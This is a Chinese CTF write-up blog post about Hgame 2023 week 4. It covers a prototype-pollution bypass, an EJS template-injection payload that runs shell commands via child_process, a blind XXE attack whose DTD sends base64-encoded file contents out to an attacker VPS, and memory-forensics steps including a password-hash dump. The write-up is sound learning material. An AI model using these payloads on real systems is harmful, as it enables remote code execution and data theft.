Hgame Week 4
|
430
|
0
|
WriteUp
|
|
JBNRZ

195 字
|
3 分钟
本文最后更新于 615 天前,其中的信息可能已经有所发展或是发生改变。

Hgame: week4
Rank:

SchoolAll
117

Hgame 2023
Rank:

SchoolAll
114

就做了 Web取证,太菜了 Orz

Web

Shared Diary

题解

  • 原型链污染,过滤了__proto__,用constructor.prototype 绕过
  • merge 函数
function merge(target, source) {
    for (let key in source) {
        // Prevent prototype pollution
        if (key === '__proto__') {
            throw new Error("Detected Prototype Pollution")
        }
        if (key in source && key in target) {
            merge(target[key], source[key])
        } else {
            target[key] = source[key]
        }
    }
}
  • 本地测试
if (!req.session.data || !req.session.data.username || req.session.role !== 'admin') {
        return res.redirect("/login")
    }
  • 还需满足条件 data data.username
  • 改包,记得将 Content-Type 改为 application/json
  • 登录后是 ejs 的 ssti
<%="pwnd".toString.constructor.call({},"return global.process.mainModule.constructor._load('child_process').execSync('cat /flag').toString()")()%>

Tell me

题解

  • xxe,关键代码
libxml_disable_entity_loader(false);
// 这里是允许外部实体
if ($_SERVER["REQUEST_METHOD"] == "POST"){
    $xmldata = file_get_contents("php://input");
    if (isset($xmldata)){
        $dom = new DOMDocument();
        try {
            $dom->loadXML($xmldata, LIBXML_NOENT | LIBXML_DTDLOAD);
        }catch(Exception $e){
            $result = "loading xml data error";
            echo $result;
            return;
        }
        $data = simplexml_import_dom($dom);
  • 无回显,网上搜个可以外带的payload
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./flag.php">
<!ENTITY % aaa SYSTEM "http://VPS-IP:9999/test.dtd">
%aaa;
]>
<user><name>a</name><email>a</email><content>a</content></user>
  • VPS 部署,python3 -m http.server 9999 启动
<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://VPS-IP:9999/%file;'> ">
%dtd;
%xxe;

Misc

ezWin

  • strings xxx.vmem | grep hgame
  • volatility3cmdline | grep flag
  • volatility3hashdump
  • cmd5 爆破 Noname 密码:asdqwe123

New_type_Steganography

题解

  • 思路差不多,不会写脚本,来个大佬教教 /(ㄒoㄒ)/~~

对这一个月的总结

这几个周过后似乎没什么提升(单指 `Web` 和 `Misc`,只能告诉我解 `SQL` 还是有些死板
对于别的方向,只能说开始接触了,有些收获,`Crypto` 还是学到了很多新东西,但是数学不咋滴,还是接受的很慢,`Reverse` 也接触到一些新的技术,收获应该只限于之后遇到能认出来是啥,`pwn` 还是一窍不通,可能将来还是不懂,之后再说吧,可能哪天能稍微悟一点儿
区块链还是先放放,差的东西有点儿多,语言还不会,就不搞这些了
`Iot` 怎么说呢,这几周就当着 `Misc` 来做的,一些硬核的知识不懂
总体上最大的收获可能还就是那 `1000` 个金币~~掉钱眼里了 Orz~~,但可惜不是现金,还得去换,难免有损耗
MISCWEB
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 

                    

                    
			        推荐文章
		            

		            

							
浙江省赛决赛 2024

							
							

							
强网杯 2024

							
							

							
浙江省赛初赛 2024

							
							

							
网鼎杯 2024

							
							

							
密码保护:K8S 再体验-RealWorld

							
							

							
ByteCTF 2024

							
							

							
羊城杯 2024

							
							

							
DASCTF x Merak 2024

							
							

							
PyJail

							
							

							
CISCN 决赛 2024